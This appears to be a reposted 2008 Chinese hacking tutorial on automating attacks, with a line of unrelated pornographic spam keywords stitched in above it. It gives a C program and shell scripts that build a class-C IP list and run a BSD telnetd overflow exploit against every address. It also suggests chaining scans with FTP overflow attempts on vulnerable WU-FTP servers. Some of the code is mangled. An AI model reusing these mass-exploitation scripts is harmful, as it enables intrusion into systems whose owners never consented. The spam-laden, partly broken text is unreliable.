欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

關(guān)于掃描的技巧與實戰(zhàn)

互聯(lián)網(wǎng)   發(fā)布時間:2008-10-08 22:12:23   作者:佚名   我要評論
面我們就以一個簡單的掃描一個C類IP里BSDTELNET漏洞機器為例子來看看:$cat num.cmain(){ int x; for (x=0;x<256;x ) printf ("%dn",x);}上面這段C我想不用我多說了吧,他生成一個C類網(wǎng)的網(wǎng)絡號,大家在編譯后可以./num >>num.txt來得到這
面我們就以一個簡單的掃描一個C類IP里BSDTELNET漏洞機器為例子來看看:$cat num.cmain(){ int x; for (x=0;x<256;x ) printf ("%d\n",x);}上面這段C我想不用我多說了吧,他生成一個C類網(wǎng)的網(wǎng)絡號,大家在編譯后可以./num >>num.txt來得到這個文本.#!/bin/sh echo -n "please ernter a ip:" read ipip list=`cat num.txt` for listip in $list do echo $ipip.$listipecho >>iplist.txt $ipip.$listip done上面這段我們來說說,read ipip是接受鍵盤的信息,用來給你輸入1.1.1這樣一個C段地址以便與下面的LISTIP合并成真正的ip,list='cat num.txt'是讀取我們剛才生成的num.txt里1-254的網(wǎng)絡號,for listip in $list是把剛才list里的num.txt內(nèi)容循環(huán)讀給listip,然后我們用echo $ipip.$listip就可以得到一個真正的ip了,再通過echo >>iplist.txt $ipip.$listip把最后得到的IP寫到iplist.txt.通過以上步驟,我們得到了一個c類ip,下面我們就來用我們事先就有的bsdtelnet溢出代碼來掃描他們了,如下:#!/bin/sh list=`cat iplist.txt` for listip in $list do ./bsdtelnet -c $listipdonelist='cat iplist.txt'讀取剛才我們生成的iplist.txt文本,for listip in $list把list里存放的ip循環(huán)送給listip, 看這個./bsdtelnet -c $listip,這個就是調(diào)用我們在當前這個SHELL所在的目錄執(zhí)行我們的exploit來對ip進行探測.全部結(jié)束,好了,細心的朋友可能發(fā)現(xiàn)了,這樣的掃描似乎很慢,呵呵,確實,因為這樣他不管23端口有沒有開,不管對方機器是不是BSD的,他都要去溢出試試,在這里,我只是通過TOMYCHEN兄提供給大家一個巧妙利用SHELL的思路,具體大家可以自己發(fā)揮,比如先在SHELL里調(diào)用掃描器掃描,然后把開放有21端口的機器保存下面,然后再對開了21端口的機器進行驗證看是否可匿名,得到會話返回消息,如果是WU-FTP260等,就可以再調(diào)用溢出程序進行測試呀等等.還是那句老話,技術(shù)最重要!----------------------------------------------- 作者:SysHunter

相關(guān)文章

最新評論